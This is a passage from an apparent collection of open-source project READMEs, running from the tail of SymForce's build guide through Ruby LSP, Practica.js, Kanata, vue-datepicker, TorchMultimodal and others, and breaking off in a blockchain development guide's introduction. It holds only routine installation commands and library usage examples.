j}, {'e'}}, // keys {{'P', i}} // keys to optimize )); } } // Odometry factors for (int i = 0; i < num_poses - 1; ++i) { factors.push_back(sym::Factor ::Hessian( sym::OdometryFactor , {{'P', i}, {'P', i + 1}, {'d', i}, {'e'}}, // keys {{'P', i}, {'P', i + 1}} // keys to optimize )); } const auto params = sym::DefaultOptimizerParams(); sym::Optimizer optimizer( params, factors, sym::kDefaultEpsilon ); sym::Values values; for (int i = 0; i < num_poses; ++i) { values.Set({'P', i}, sym::Pose2d::Identity()); } // Set additional values values.Set({'L', 0}, Eigen::Vector2d(-2, 2)); values.Set({'L', 1}, Eigen::Vector2d(1, -3)); values.Set({'L', 2}, Eigen::Vector2d(5, 2)); values.Set({'d', 0}, 1.7); values.Set({'d', 1}, 1.4); const std::array , 3> angles = { {{55, 245, -35}, {95, 220, -20}, {125, 220, -20}} }; for (int i = 0; i < angles.size(); ++i) { for (int j = 0; j < angles[0].size(); ++j) { values.Set({'a', i, j}, angles[i][j] * M_PI / 180); } } values.Set('e', sym::kDefaultEpsilond); // Optimize! const auto stats = optimizer.Optimize(values); std::cout << "Exit status: " << stats.status << std::endl; std::cout << "Optimized values:" << values << std::endl; ``` This tutorial shows the central workflow in SymForce for creating symbolic expressions, generating code, and optimizing. This approach works well for a wide range of complex problems in robotics, computer vision, and applied science. However, each piece may also be used independently. The optimization machinery can work with handwritten functions, and the symbolic math and code generation is useful outside of any optimization context. To learn more, visit the SymForce tutorials here . Build from Source For best results, you should build from the latest tagged release . You can also build from main , or from another branch, but everything is less guaranteed to work. SymForce requires Python 3.8 or later. The build is currently tested on Linux and macOS, SymForce on Windows is untested (see #145 ). We strongly suggest creating a virtual python environment. Install the gmp package with one of: bash apt install libgmp-dev # Ubuntu brew install gmp # Mac conda install -c conda-forge gmp # Conda SymForce contains both C++ and Python code. The C++ code is built using CMake. You can build the package either by calling pip, or by calling CMake directly. If building with pip , this will call CMake under the hood, and run the same CMake build for the C++ components. If you encounter build issues, please file an issue . Build with pip If you just want to build and install SymForce without repeatedly modifying the source, the recommended way to do this is with pip. From the symforce directory: bash pip install . If you're modifying the SymForce Python sources, you can do an editable install instead. This will let you modify the Python components of SymForce without reinstalling. If you're going to repeatedly modify the C++ sources, you should instead build with CMake directly as described below . From the symforce directory: bash pip install -e . You should then verify your installation . Note: pip install . will not install pinned versions of SymForce's dependencies, it'll install any compatible versions. It also won't install all packages required to run all of the SymForce tests and build all of the targets (e.g. building the docs or running the linters). If you want all packages required for that, you should pip install .[dev] instead (or one of the other groups of extra requirements in our setup.py ). If you additionally want pinned versions of our dependencies, which are the exact versions guaranteed by CI to pass all of our tests, you can install them from pip install -r dev_requirements.txt . Note: Editable installs as root with the system python on Ubuntu (and other Debian derivatives) are broken on setuptools<64.0.0 . This is a bug in Debian , not something in SymForce that we can fix. If this is your situation, either use a virtual environment, upgrade setuptools to a version >=64.0.0 , or use a different installation method. Build with CMake If you'll be modifying the C++ parts of SymForce, you should build with CMake directly instead - this method will not install SymForce into your Python environment, so you'll need to add it to your PYTHONPATH separately. Install python requirements: bash pip install -r dev_requirements.txt Build SymForce (requires C++14 or later): bash mkdir build cd build cmake .. make -j $(nproc) You'll then need to add SymForce (along with gen/python and third_party/skymarshal within symforce and lcmtypes/python2.7 within the build directory) to your PYTHONPATH in order to use them, for example: bash export PYTHONPATH="$PYTHONPATH:/path/to/symforce:/path/to/symforce/build/lcmtypes/python2.7" If you want to install SymForce to use its C++ libraries in another CMake project, you can do that with: bash make install SymForce does not currently integrate with CMake's find_package (see #209 ), so if you do this you currently need to add its libraries as link dependencies in your CMake project manually. Verify your installation ```python import symforce symforce.get_symbolic_api() 'symengine' from symforce import cc_sym ``` If you see 'sympy' here instead of 'symengine' , or can't import cc_sym , your installation is probably broken and you should submit an issue . License SymForce is released under the Apache 2.0 license. See the LICENSE file for more information. Sponsors SymForce is developed and maintained by Skydio . It is released as a free and open-source library for the robotics community. Contributing While SymForce already powers tens of thousands of robots at Skydio, the public library is new and we are releasing it in beta stage. This is just the beginning, and we are excited for engagement from the community. Thank you for helping us develop SymForce! The best way to get started is to file issues for bugs or desired features. There are many features we're excited to add to SymForce and would love to see contributed by the community. Most are outlined in the issues, but some major desired contributions are: Add more backend languages, such as TypeScript and GLSL/HLSL, and improvements to the experimental CUDA and PyTorch backends Support for WebAssembly compilation More Lie group types, in particular Sim(3) Support for constraints in our optimizer Integration with ISPC Windows and conda packages;Fast symbolic computation, code generation, and nonlinear optimization for robotics;robotics,python,cpp,code-generation,optimization,symbolic-computation,slam,computer-vision,motion-planning,structure-from-motion
symforce-org/symforce
Shopify/ruby-lsp;Ruby LSP The Ruby LSP is an implementation of the language server protocol for Ruby, used to improve rich features in editors. It is a part of a wider goal to provide a state-of-the-art experience to Ruby developers using modern standards for cross-editor features, documentation and debugging. Want to discuss Ruby developer experience? Consider joining the public Ruby DX Slack workspace . Features The Ruby LSP features include Semantic highlighting Symbol search and code outline RuboCop errors and warnings (diagnostics) Format on save (with RuboCop or Syntax Tree) Format on type Debugging support Running and debugging tests through VS Code's UI Go to definition for classes, modules, constants and required files Showing documentation on hover for classes, modules and constants Completion for classes, modules, constants and require paths Fuzzy search classes, modules and constants anywhere in the project and its dependencies (workspace symbol) Adding method support for definition, completion, hover and workspace symbol is partially supported, but not yet complete. Follow progress in https://github.com/Shopify/ruby-lsp/issues/899 See complete information about features here . If you experience issues, please see the troubleshooting guide . Usage With VS Code If using VS Code, all you have to do is install the Ruby LSP extension to get the extra features in the editor. Do not install the ruby-lsp gem manually. For more information on using and configuring the extension, see vscode/README.md . With other editors See editors for community instructions on setting up the Ruby LSP, which current includes Emacs, Neovim, Sublime Text, and Zed. The gem can be installed by doing shell gem install ruby-lsp and the language server can be launched running ruby-lsp (without bundle exec in order to properly hook into your project's dependencies). Documentation See the documentation for more in-depth details about the supported features . For creating rich themes for Ruby using the semantic highlighting information, see the semantic highlighting documentation . Configuring code indexing By default, the Ruby LSP indexes all Ruby files defined in the current project and all of its dependencies, including default gems, except for Gems that only appear under the :development group All Ruby files under test/**/*.rb By creating a .index.yml file, these configurations can be overridden and tuned. Note that indexing dependent behavior, such as definition, hover, completion or workspace symbol will be impacted by the configurations placed here. ```yaml Exclude files based on a given pattern. Often used to exclude test files or fixtures excluded_patterns: - " /spec/ /*.rb" Include files based on a given pattern. Can be used to index Ruby files that use different extensions included_patterns: - "* /bin/ " Exclude gems by name. If a gem is never referenced in the project's code and is only used as a tool, excluding it will speed up indexing and reduce the amount of results in features like definition or completion excluded_gems: - rubocop - pathname Include gems by name. Normally used to include development gems that are excluded by default included_gems: - prism ``` Addons The Ruby LSP provides an addon system that allows other gems to enhance the base functionality with more editor features. This is the mechanism that powers addons like Ruby LSP Rails Ruby LSP RSpec Ruby LSP rubyfmt Other community driven addons can be found in rubygems by searching for the ruby-lsp prefix. For instructions on how to create addons, see the addons documentation . Learn More RubyConf 2022: Improving the development experience with language servers ( Vinicius Stock ) Remote Ruby: Ruby Language Server with Vinicius Stock RubyKaigi 2023: Code indexing - How language servers understand our code ( Vinicius Stock ) Contributing Bug reports and pull requests are welcome on GitHub at https://github.com/Shopify/ruby-lsp. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct. If you wish to contribute, see CONTRIBUTING for development instructions and check out our pinned roadmap issue for a list of tasks to get started. License The gem is available as open source under the terms of the MIT License .;An opinionated language server for Ruby;lsp,ruby
Shopify/ruby-lsp
practicajs/practica;Generate a Node.js app that is packed with best practices AND simplicity in mind. Based off our repo Node.js best practices (96,100 stars) Twitter | Documentation site A One Paragraph Overview Although Node.js has great frameworks 💚, they were never meant to be dev & production ready immediately (e.g., no architecture layers, DB schemas, docker file, etc etc). Practica.js aims to bridge the gap. Based on your preferred framework, we generate example code that demonstrates a full Microservice flow, from API to DB, that is packed with good practices. For example, we include a battle-tested error handler, sanitized API response, hardened dockerfile, thoughtful 3-tier folder structure, great testing templates with DB, and more. This saves a great deal of time and can prevent painful mistakes. All decisions made are neatly and thoughtfully documented . We strive to keep things as simple and standard as possible and base our work on the popular guide: Node.js Best Practices 1 min video 👇, ensure audio is activated https://user-images.githubusercontent.com/8571500/170464232-43355e43-98cf-4069-b9fc-6bc303a39efc.mp4 Table of Contents Super-Quick Setup Our Philosophies and Unique Values Practices and Features The People Behind Practica.js Our best practices guide, 78,000 stars ✨ Contribution guide Documentation site YouTube Coming Soon: Example Applications Express, PostgreSQL, with common best practices Express, mongo-db, with common best practices Express, PostgreSQL, with all best practices (advanced) Minimal with project setup configuration only More Flavours Fastify, PostgreSQL Fastify, mongo-db Generate Your Own Interactively More coming soon Super-Quick Setup Run Practica.js from the Command Line Run practica CLI and generate our default app (you can customize it using different flags): bash npx @practica/create-node-app immediate --install-dependencies ✨ And you're done! That's it, the code's all been generated. Our default setup includes Fastify for the web layer, Sequelize for the data access and PostgreSQL Prefer express and Prisma? Just pass the right flags to the CLI: bash npx @practica/create-node-app immediate --install-dependencies --web-framework=express --orm=prisma Prefer other DB? We use standard ORMs, read its docs and switch DB. This is your code, do whatever you like Start the Project bash cd {your chosen folder name} npm install Then choose whether to start the app: bash npm run or run the tests: bash npm test Pretty straightforward, right? You just got a Node.js Monorepo solution with one example component/Microservice and multiple libraries. Based on this hardened solution you can build a robust application. The example component/Microservice is located under: {your chosen folder name}/services/order-service . This is where you'll find the API and a good spot to start your journey from Next Steps ✅ Start coding. The code we generate is minimal by design and based on known libraries. This should help you get up to speed quickly. ✅ Read our 'coding with practica' guide ✅ Master it by reading our docs at https://practica.dev . Our Philosophies and Unique Values 1. Best Practices on top of known Node.js frameworks We don't re-invent the wheel. Rather, we use your favorite framework and empower it with structure and real examples. With a single command you can get an Express/Fastify-based codebase with many thoughtful best practices inside 2. Simplicity, how Node.js was intended Keeping it simple, flat, and based on native Node/JS capabilities is part of this project's DNA. We believe that too many abstractions, high-complexity or fancy language features can quickly become a stumbling block for the team To name a few examples, our code flow is flat with almost no level of indirection, no DI - it's just simple functions calling other functions. Although using TypeScript, almost no features are being used besides types, for modularization we simply use... Node.js modules 3. Supports many technologies and frameworks Good Practices and Simplicity is the name of the game with Practica. There is no need to narrow our code to a specific framework or database. We aim to support the popular Node.js frameworks and data access approaches Practices and Features We apply dozens of practices and optimizations. You can opt in or out for most of these features using option flags on our CLI. The following table lists just a few examples out of the full list of features we provide . | Feature | Explanation | Flag | Docs | | ----------- | --------------- | -------- | -------- | | Monorepo setup | Generates two components (e.g., Microservices) in a single repository with interactions between the two | --mr, --monorepo | Docs here | | Output escaping and sanitizing | Clean-out outgoing responses from potential HTML security risks like XSS | --oe, --output-escape | Docs here | | Integration (component) testing | Generates full-blown component/integration tests setup including DB | --t, --tests | Docs here | | Unique request ID (Correlation ID) | Generates module that creates a unique correlation/request ID for every incoming request. This is available for any other object during the request life-span. Internally it uses Node's built-in AsyncLocalStorage | --coi, --correlation-id | Docs here | | Dockerfile | Generates dockerfile that embodies >20 best practices | --df, --docker-file | Docs here | | Strong-schema configuration | A configuration module that dynamically load run-time configuration keys and includes a strong schema so it can fail fast | Built-in with basic app | Docs here | 📗 See our full list of features here The People Behind Practica.js Steering Committee Practica is a community-driven open-source project. It's being led voluntarily by engineers from many different companies. These companies are just a few who encourage their engineers to contribute and keep this project moving. 💚 A Nasdaq 100 company, a world leader in design software Leader IoT provider, part of 'Cox Communication', the 3rd largest cable company in the US Core Team Yoni Goldberg Independent Node.js consultant Michael Solomon Node.js lead Raz Luvaton Node.js developer Daniel Gluskin Node.js lead Ariel Steiner Node.js developer Tomer Kohane Frontend geek Dan Goldberg Node.js lead Ron Dahan Node.js expert Partners These companies are keen for continuous improvement and their engineers to have been known to contribute during work hours. Our Amazing Contributors 💚 A million thanks to these great people who have contributed code to our project: Brian Clark 💻 Raz Luvaton 🖋 💻 Michael Solomon 💻 itainoam 💻 📆 shanizlo 💻 Ron Dahan 💻 AlonK 💻 Jose Luis Alvarez Herrera 🖋 💻 reinaldo-calderon-team 💻 KarelVerschraegen 📖 Daniel Morrison 🖋 Sean Lowe 💡 🖋 idobetesh 💻 Alejandra Acosta 💻 adandanielteamint 🖋 Rashad Majali 💻 yohai zvuloon 🖋 Yonatan Kra 🖋 Yoni Rapoport 🖋 perilevy 💻 ToMer-K 💻 hen arbel 💻 Mojca Ostir 💻 evbambly 🖋 Amir Adar 🖋 Sebastien Vaucouleur 🖋 Harry Dobrev 💻 Bassam Ismail 📖 Marcos Molina 💻 Isen Kasa 💻 Vishal Sharma 💻;Node.js solution starter boilerplate that is production-ready, packed with ✅ best practices and built with simplicity in mind;nodejs,best-practices,express,fastify,postgresql,mongodb,boilerplate,starter-kit,hacktoberfest
practicajs/practica
jtroo/kanata;Kanata Improve your keyboard comfort What does this do? This is a cross-platform software keyboard remapper for Linux, macOS and Windows. A short summary of the features: multiple layers of key functionality advanced key behaviour customization (e.g. tap-hold, macros, unicode) cross-platform human readable configuration file Check out the examples directory and the online simulator . To see all of the features, see the configuration guide . The configuration guide aims to be up-to-date with main and may have features not in your version. See the applicable link in the releases page . The most similar project is kmonad , which served as the inspiration for kanata. Here's a comparison document . You can see a list of known issues here . Demo video Showcase of multi-layer functionality (30s, 1.7 MB) . Why is this useful? Imagine if, instead of pressing Shift to type uppercase letters, we had giant keyboards with separate keys for lowercase and uppercase letters. I hope we can all agree: that would be a terrible user experience! A way to think of how Shift keys work is that they switch your input to another layer of functionality where you now type uppercase letters and symbols instead of lowercase letters and numbers. What kanata allows you to do is take this alternate layer concept that Shift keys have and apply it to any key. You can then customize what those layers do to suit your exact needs and workflows. Usage Running kanata currently does not start it in a background process. You will need to keep the window that starts kanata running to keep kanata active. Some tips for running kanata in the background: Windows: https://github.com/jtroo/kanata/discussions/193 Linux: https://github.com/jtroo/kanata/discussions/130 Run from tray icon: kanata-tray Pre-built executables See the releases page for executables and instructions. Build it yourself This project uses the latest Rust stable toolchain. If you installed the Rust toolchain using rustup , e.g. by using the instructions from the official website , you can get the latest stable toolchain with rustup update stable . Instructions Using `cargo install`: cargo install kanata # On Linux and macOS, this may not work without `sudo`, see below kanata --cfg Build and run yourself in Linux: git clone https://github.com/jtroo/kanata && cd kanata cargo build # --release optional, not really perf sensitive # sudo is used because kanata opens /dev/ files # # See below if you want to avoid needing sudo: # https://github.com/jtroo/kanata/wiki/Avoid-using-sudo-on-Linux sudo target/debug/kanata --cfg Build and run yourself in Windows. git clone https://github.com/jtroo/kanata; cd kanata cargo build # --release optional, not really perf sensitive target\debug\kanata --cfg Build and run yourself in macOS: For macOS version 11 and newer: Install the [Karabiner VirtualHiDDevice Driver](https://github.com/pqrs-org/Karabiner-DriverKit-VirtualHIDDevice/blob/main/dist/Karabiner-DriverKit-VirtualHIDDevice-3.1.0.pkg). To activate it: `/Applications/.Karabiner-VirtualHIDDevice-Manager.app/Contents/MacOS/Karabiner-VirtualHIDDevice-Manager activate` For macOS version 10 and older: Install the [Karabiner kernel extension](https://github.com/pqrs-org/Karabiner-VirtualHIDDevice). git clone https://github.com/jtroo/kanata && cd kanata cargo build # --release optional, not really perf sensitive # sudo is needed to gain permission to intercept the keyboard sudo target/debug/kanata --cfg The full configuration guide is [found here](./docs/config.adoc). Sample configuration files are found in [cfg_samples](./cfg_samples). The [simple.kbd](./cfg_samples/simple.kbd) file contains a basic configuration file that is hopefully easy to understand but does not contain all features. The `kanata.kbd` contains an example of all features with documentation. The release assets also have a `kanata.kbd` file that is tested to work with that release. All key names can be found in the [keys module](./src/keys/mod.rs), and you can also define your own key names. Feature flags When either building yourself or using cargo install , you can add feature flags that enable functionality that is turned off by default. Instructions If you want to enable the `cmd` actions, add the flag `--features cmd`. For example: ``` cargo build --release --features cmd cargo install --features cmd ``` On Windows, if you want to compile a binary that uses the Interception driver, you should add the flag `--features interception_driver`. For example: ``` cargo build --release --features interception_driver cargo install --features interception_driver ``` To combine multiple flags, use a single `--features` flag and use a comma to separate the features. For example: ``` cargo build --release --features cmd,interception_driver cargo install --features cmd,interception_driver ``` Other installation methods Notable features Human readable configuration file. Minimal example Full guide Simple example with explanations All features showcase Live reloading of the configuration for easy testing of your changes. Multiple layers of key functionality Advanced actions such as tap-hold, unicode output, dynamic and static macros Vim-like leader sequences to execute other actions Optionally run a TCP server to interact with other programs Other programs can respond to layer changes or trigger layer changes Interception driver support (use kanata_wintercept.exe ) Note that this issue exists, which is outside the control of this project: https://github.com/oblitum/Interception/issues/25 Contributing Contributions are welcome! Unless explicitly stated otherwise, your contributions to kanata will be made under the LGPL-3.0-only * license. Some directories are exceptions: - keyberon : MIT License - interception : MIT or Apache-2.0 Licenses Here's a basic low-effort design doc of kanata How you can help Try it out and let me know what you think. Feel free to file an issue or start a discussion. Usability issues and unhelpful error messages are considered bugs that should be fixed. If you encounter any, I would be thankful if you file an issue. Browse the open issues and help out if you are able and/or would like to. If you want to try contributing, feel free to ping jtroo for some pointers. If you know anything about writing a keyboard driver for Windows, starting an open-source alternative to the Interception driver would be lovely. Community projects related to kanata vscode-kanata : Language support for kanata configuration files in VS Code komokana : Automatic application-aware layer switching for komorebi (Windows) kanata-tray : Control kanata from a tray icon Application-aware layer switching: qanata (Linux) kanawin (Windows) window_tools (Windows) What does the name mean? I wanted a "k" word since this relates to keyboards. According to Wikipedia, kanata is an indigenous Iroquoian word meaning "village" or "settlement" and is the origin of Canada's name. There's also PPT✧. Motivation TLDR: QMK features but for any keyboard, not just fancy mechanical ones. Long version I have a few keyboards that run [QMK](https://docs.qmk.fm/#/). QMK allows the user to customize the functionality of their keyboard to their heart's content. One great use case of QMK is its ability map keys so that they overlap with the home row keys but are accessible on another layer. I won't comment on productivity, but I find this greatly helps with my keyboard comfort. For example, these keys are on the right side of the keyboard: 7 8 9 u i o j k l m , . On one layer I have arrow keys in the same position, and on another layer I have a numpad. arrows: numpad: - - - 7 8 9 - ↑ - 4 5 6 ← ↓ → 1 2 3 - - - 0 * . One could add as many customizations as one likes to improve comfort, speed, etc. Personally my main motivator is comfort due to a repetitive strain injury in the past. However, QMK doesn't run everywhere. In fact, it doesn't run on **most** hardware you can get. You can't get it to run on a laptop keyboard or any mainstream office keyboard. I believe that the comfort and empowerment QMK provides should be available to anyone with a computer on their existing hardware, instead of having to purchase an enthusiast mechanical keyboard (which are admittedly very nice — I own a few — but can be costly). The best alternative solution that I found for keyboards that don't run QMK was [kmonad](https://github.com/kmonad/kmonad). This is an excellent project and I recommend it if you want to try something similar. The reason for this project's existence is that kmonad is written in Haskell and I have no idea how to begin contributing to a Haskell project. From an outsider's perspective I think Haskell is a great language but I really can't wrap my head around it. And there are a few [outstanding issues](./docs/kmonad_comparison.md) at the time of writing that make kmonad suboptimal for my personal workflows. This project is written in Rust because Rust is my favourite programming language and the prior work of the awesome [keyberon crate](https://github.com/TeXitoi/keyberon) exists. Similar Projects kmonad : The inspiration for kanata (Linux, Windows, Mac) QMK : Open source keyboard firmware keyberon : Rust #[no_std] library intended for keyboard firmware ktrl : Linux-only keyboard customizer with layers, a TCP server, and audio support kbremap : Windows-only keyboard customizer with layers and unicode xcape : Linux-only tap-hold modifiers karabiner-elements : Mac-only keyboard customizer capsicain : Windows-only key remapper with driver-level key interception keyd : Linux-only key remapper very similar to QMK, kmonad, and kanata xremap : Linux-only application-aware key remapper inspired more by Emacs key sequences vs. QMK layers/Vim modes keymapper : Context-aware cross-platform key remapper with a different transformation model (Linux, Windows, Mac) Why the list? While kanata is the best tool for some, it may not be the best tool for you. I'm happy to introduce you to tools that may better suit your needs. This list is also useful as reference/inspiration for functionality that could be added to kanata. Donations/Support? The author (jtroo) will not accept monetary donations for work on kanata. Please instead donate your time and/or money to charity. Some links are below. These links are provided for learning and as interesting reads. They are not an endorsement. https://www.effectivealtruism.org/ https://www.givewell.org/;Improve keyboard comfort and usability with advanced customization;keyboard,rust,cross-platform,linux,windows,interception-driver,keyboard-layout,mouse,mouse-emulation,macos
jtroo/kanata
probml/pml2-book;"Probabilistic Machine Learning: Advanced Topics" by Kevin Murphy. This repo is used to store the pdf for book 2 (see "releases" tab on RHS). This lets me keep track of downloads and issues in a way which can be tracked separately from book 1 .;Probabilistic Machine Learning: Advanced Topics;[]
probml/pml2-book
Vuepic/vue-datepicker;@vuepic/vue-datepicker The most complete datepicker solution for Vue 3 DOCUMENTATION StackBlitz Playground Features Single date picker Range date picker Time picker Month picker Year picker Quarter picker Week picker Multiple dates select Multiple calendars Text input UTC support Timezones Locale support Week numbers Custom v-model Dark and light theme SSR support Highly configurable Accessible Included type definitions Install ```shell npm npm install @vuepic/vue-datepicker yarn yarn add @vuepic/vue-datepicker pnpm pnpm add @vuepic/vue-datepicker bun bun add @vuepic/vue-datepicker ``` Import and register component Global ```js import { createApp } from 'vue'; import App from './App.vue'; import VueDatePicker from '@vuepic/vue-datepicker'; import '@vuepic/vue-datepicker/dist/main.css'; const app = createApp(App); app.component('VueDatePicker', VueDatePicker); ``` Local ```vue ``` Supporting the project As you may know, maintaining an open-source project is a very time-consuming job. Your support is very appreciated ❤️ Please ⭐️ this repository if you like the component! You can also make a financial contribution via sponsoring this project or one time donation. Become a sponsor Special thanks to our sponsors 🙏 Contributors Thanks to all people who contributed to the project 🙏 Versioning This project follows SemVer specification License Copyright © 2021-present Vuepic MIT;Datepicker component for Vue 3;vue,datetime,timepicker,datepicker,daterangepicker,datetimepicker,vue-datepicker,vue3,vue-datetimepicker
Vuepic/vue-datepicker
kirillzyusko/react-native-keyboard-controller;react-native-keyboard-controller Keyboard manager which works in identical way on both iOS and Android. Demonstration Key features mapping keyboard movement to animated values 😎 missing keyboardWillShow / keyboardWillHide events are available on Android 😍 module for changing soft input mode on Android 🤔 reanimated support 🚀 interactive keyboard dismissing 👆📱 prebuilt components ( KeyboardStickyView , KeyboardAwareScrollView , re-worked KeyboardAvoidingView ) 📚 KeyboardToolbar with easy behavior customization of previous , next and done buttons in the keyboard toolbar 📐 easy focused input information retrieval 📝 🔮 works with any navigation library 🧭 and more is coming... Stay tuned! 😊 Installation Install react-native-keyboard-controller package from npm: ```shell yarn add react-native-keyboard-controller or npm install react-native-keyboard-controller --save ``` Documentation Check out our dedicated documentation page for info about this library, API reference and more: https://kirillzyusko.github.io/react-native-keyboard-controller/ Contributing See the contributing guide to learn how to contribute to the repository and the development workflow. License MIT;Keyboard manager which works in identical way on both iOS and Android;animation,keyboard,react-native,android,ios,focused-input,avoiding-view,keyboard-toolbar
kirillzyusko/react-native-keyboard-controller
facebookresearch/multimodal;TorchMultimodal (Beta Release) Models | Example scripts | Getting started | Code overview | Installation | Contributing | License Introduction TorchMultimodal is a PyTorch library for training state-of-the-art multimodal multi-task models at scale, including both content understanding and generative models. TorchMultimodal contains: - A repository of modular and composable building blocks (fusion layers, loss functions, datasets and utilities). - A collection of common multimodal model classes built up from said building blocks with pretrained weights for canonical configurations. - A set of examples that show how to combine these building blocks with components and common infrastructure from across the PyTorch Ecosystem to replicate state-of-the-art models published in the literature. These examples should serve as baselines for ongoing research in the field, as well as a starting point for future work. Models TorchMultimodal contains a number of models, including ALBEF: model class , paper BLIP-2: model class , paper CLIP: model class , paper CoCa: model class , paper DALL-E 2: model , paper FLAVA: model class , paper MAE/Audio MAE: model class , MAE paper , Audio MAE paper MDETR: model class , paper Example scripts In addition to the above models, we provide example scripts for training, fine-tuning, and evaluation of models on popular multimodal tasks. Examples can be found under examples/ and include | Model | Supported Tasks | | :--------------------------------------: | :----------------------: | | ALBEF | Retrieval Visual Question Answering | | DDPM | Training and Inference (notebook) | FLAVA | Pretraining Fine-tuning Zero-shot | | MDETR | Phrase grounding Visual Question Answering | | MUGEN | Text-to-video retrieval Text-to-video generation | | Omnivore | Pre-training Evaluation | Getting started Below we give minimal examples of how you can write a simple training or zero-shot evaluation script using components from TorchMultimodal. FLAVA zero-shot example ```python import torch from PIL import Image from torchmultimodal.models.flava.model import flava_model from torchmultimodal.transforms.bert_text_transform import BertTextTransform from torchmultimodal.transforms.flava_transform import FLAVAImageTransform # Define helper function for zero-shot prediction def predict(zero_shot_model, image, labels): zero_shot_model.eval() with torch.no_grad(): image = image_transform(img)["image"].unsqueeze(0) texts = text_transform(labels) _, image_features = zero_shot_model.encode_image(image, projection=True) _, text_features = zero_shot_model.encode_text(texts, projection=True) scores = image_features @ text_features.t() probs = torch.nn.Softmax(dim=-1)(scores) label = labels[torch.argmax(probs)] print( "Label probabilities: ", {labels[i]: probs[:, i] for i in range(len(labels))}, ) print(f"Predicted label: {label}") image_transform = FLAVAImageTransform(is_train=False) text_transform = BertTextTransform() zero_shot_model = flava_model(pretrained=True) img = Image.open("my_image.jpg") # point to your own image predict(zero_shot_model, img, ["dog", "cat", "house"]) # Example output: # Label probabilities: {'dog': tensor([0.80590]), 'cat': tensor([0.0971]), 'house': tensor([0.0970])} # Predicted label: dog ``` MAE training example ```python import torch from torch.utils.data import DataLoader from torchmultimodal.models.masked_auto_encoder.model import vit_l_16_image_mae from torchmultimodal.models.masked_auto_encoder.utils import ( CosineWithWarmupAndLRScaling, ) from torchmultimodal.modules.losses.reconstruction_loss import ReconstructionLoss from torchmultimodal.transforms.mae_transform import ImagePretrainTransform mae_transform = ImagePretrainTransform() dataset = MyDatasetClass(transforms=mae_transform) # you should define this dataloader = DataLoader(dataset, batch_size=8) # Instantiate model and loss mae_model = vit_l_16_image_mae() mae_loss = ReconstructionLoss() # Define optimizer and lr scheduler optimizer = torch.optim.AdamW(mae_model.parameters()) lr_scheduler = CosineWithWarmupAndLRScaling( optimizer, max_iters=1000, warmup_iters=100 # you should set these ) # Train one epoch for batch in dataloader: model_out = mae_model(batch["images"]) loss = mae_loss(model_out.decoder_pred, model_out.label_patches, model_out.mask) loss.backward() optimizer.step() lr_scheduler.step() ``` Code overview torchmultimodal/diffusion_labs diffusion_labs contains components for building diffusion models. For more details on these components, see diffusion_labs/README.md . torchmultimodal/models Look here for model classes as well as any other modeling code specific to a given architecture. E.g. the directory torchmultimodal/models/blip2 contains modeling components specific to BLIP-2. torchmultimodal/modules Look here for common generic building blocks that can be stitched together to build a new architecture. This includes layers like codebooks , patch embeddings , or transformer encoder/decoders , losses like contrastive loss with temperature or reconstruction loss , encoders like ViT and BERT , and fusion modules like Deep Set fusion . torchmultimodal/transforms Look here for common data transforms from popular models, e.g. CLIP , FLAVA , and MAE . Installation TorchMultimodal requires Python >= 3.8. The library can be installed with or without CUDA support. The following assumes conda is installed. Prerequisites Install conda environment conda create -n torch-multimodal python=\<python_version\> conda activate torch-multimodal Install pytorch, torchvision, and torchaudio. See PyTorch documentation . ``` Use the current CUDA version as seen here Select the nightly Pytorch build, Linux as the OS, and conda. Pick the most recent CUDA version. conda install pytorch torchvision torchaudio pytorch-cuda=\<cuda_version> -c pytorch-nightly -c nvidia For CPU-only install conda install pytorch torchvision torchaudio cpuonly -c pytorch-nightly ``` Install from binaries Nightly binary on Linux for Python 3.8 and 3.9 can be installed via pip wheels. For now we only support Linux platform through PyPI . python -m pip install torchmultimodal-nightly Building from Source Alternatively, you can also build from our source code and run our examples : ``` git clone --recursive https://github.com/facebookresearch/multimodal.git multimodal cd multimodal pip install -e . ``` For developers please follow the development installation . Contributing We welcome any feature requests, bug reports, or pull requests from the community. See the CONTRIBUTING file for how to help out. License TorchMultimodal is BSD licensed, as found in the LICENSE file.;TorchMultimodal is a PyTorch library for training state-of-the-art multimodal multi-task models at scale.;[]
facebookresearch/multimodal
dcbuild3r/blockchain-development-guide;Disclaimer: this repo is not maintained with up to date content. Please visit devpill.me to read the newest version of this guide. DevPill.me - A Public Good Blockchain Development Guide Support this public good I’m trying to gather resources to fund the development of this public good blockchain development guide and so I got my fren Ana Rueda (@ruedart) to create this amazing graphic for the Mirror NFT edition . The funds will go to the continued development of this guide (90%) and to Ana for the creation of the art (10%). I’m open to discussion on how to structure the open collaboration around the guide and to allocating the funds into a community-owned multi-sig. The goal is to use the funds gathered on Mirror, Gitcoin grants round 13 and elsewhere to incentivize developers to create sections through bounty submissions. If this idea doesn’t gather appeal, then I will send the funds to the Gitcoin grants matching round so that other public goods get funded. Links to support the development of the blockchain development guide: Mirror NFTs Gitcoin grants (Gitcoin grants round 13 goes from march 9th - 24th, happens recurrently every 3 months) Community If you want to contribute to devpill or to discuss any of the topics and resources found in the guide. Feel free to join our Discord , and follow us on Twitter and Lenster . This repo will not reflect any changes on the devpill.me website , the repo for the site can be found here and content with the corresponding markdown files is located in this directory . Please submit PRs there instead as it makes it easier for me to process and review. Introduction Nowadays there are countless well-made resources on how to learn blockchain development of all kinds and with different specializations in mind, however, it is still very hard to get guidance and personalized suggestions based on your interests. I am writing this guide in order to provide an aggregator of all the resources that I've found over the years, plus give some opinionated commentary on how to approach them and how to use them in order to maximize learning and practical understanding in order to get building cool things in the space as soon as possible. This guide will focus on the Ethereum ecosystem as that's where most developers and applications are. If you are interested in other ecosystems that are non-EVM compatible and are not L2s on Ethereum, then check out their respective documentation or guides written by their developer communities. Examples of other non-EVM compatible blockchains that are popular are Solana (Rust/Anchor), Polkadot (Rust/Substrate), Cosmos, Terra, and others. Most of these blockchains do or will support the EVM stack through various initiatives like Neon EVM (Solana), Moonbeam/Moonriver (Polkadot/Kusama), EVMOS (Cosmos), etc. I really want this guide to become a community-sourced public good that everyone will be able to take advantage of. I will do my best to present it to the wider blockchain developer community to get constructive feedback, proofreading help, and insight into how to make it the best available guide available. What is blockchain development? There are two main categories in my mind, either you build the infrastructure that runs blockchain-based networks or you build applications that run on top of these decentralized and permissionless networks. Of course, this differentiation doesn't encompass all types of development on blockchains, but it is a good way to get started. Core blockchain development By blockchain infrastructure, people usually mean client implementations of blockchain protocols that nodes or validators run to keep the chains running. These clients are usually focused on distributed ledger technology, networking, virtual machines, and various other low-level types of engineering. The client is what 